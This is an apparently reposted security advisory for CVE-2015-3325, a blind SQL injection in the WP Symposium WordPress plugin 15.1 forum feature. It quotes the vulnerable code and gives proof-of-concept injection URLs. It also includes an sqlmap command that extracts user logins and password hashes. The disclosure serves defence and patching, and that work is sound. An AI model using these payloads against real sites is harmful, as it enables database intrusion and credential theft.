WordPress WP Symposium Plugin 15.1 SQL Injection Vulnerability

2015-05-21 19:05:12

=======================================================================

title: SQL Injection
product: WordPress WP Symposium Plugin
vulnerable version: 15.1 (and probably below)
fixed version: 15.4
CVE number: CVE-2015-3325
impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
homepage: https://wordpress.org/plugins/wp-symposium/
found: 2015-02-07
by: Hannes Trunde

mail: [email protected]
twitter: @hannestrunde

=======================================================================


Plugin description:
-------------------
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress
plugin that provides a forum, activity (similar to Facebook wall), member
directory, private mail, notification panel, chat windows, profile page, social
widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook
Connect and Mobile support! You simply choose which you want to activate!
Certain features are optional to members to protect their privacy."

Source: https://wordpress.org/plugins/wp-symposium/


Recommendation:
---------------
The author has provided a fixed plugin version which should be installed
immediately.


Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind sql injection attack can be
performed within the forum feature to obtain sensitive information from the
database. The vulnerable code sections are described below.

forum.php lines 59-62:
===============================================================================
if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) {
$cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0;
$topic_id = isset($_GET['show']) ? $_GET['show'] : 0; // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE
}
===============================================================================

forum.php lines 95-103:
===============================================================================
if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) {
if ($topic_id == 0) {
$forum = __wps__getForum($cat_id);
if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3);
$html .= $forum;
} else {
$html .= __wps__getTopic($topic_id); // __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER
}
}
===============================================================================

functions.php lines 152-155:
===============================================================================
$post = $wpdb->get_row("
SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info
FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID
WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id); //UNVALIDATED $topic_id IS USED IN SQL QUERY
===============================================================================


Proof of concept:
-----------------
The following HTTP request to the forum page returns the topic with id 1:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1
===============================================================================

The following HTTP request to the forum page returns a blank page, thus
confirming the blind SQL injection vulnerability:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0
===============================================================================

Obtaining users and password hashes with sqlmap may look as follows:
================================================================================
sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users"
================================================================================


Contact timeline:
------------------------
2015-04-08: Contacting author via mail.
2015-04-13: Mail from author, confirming the vulnerability.
2015-04-14: Requesting CVE via post to the open source software security mailing
list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-15: Mail from author, stating that updated plugin version will be
available in the next few days.
2015-05-05: Mail from author, stating that fixed version has been uploaded and
should be available soon.
2015-05-07: Confirming that update is available, releasing security advisory


Solution:
---------
Update to the most recent plugin version.


Workaround:
-----------
See solution.

Fixes

No fixes

In order to submit a new fix you need to be registered.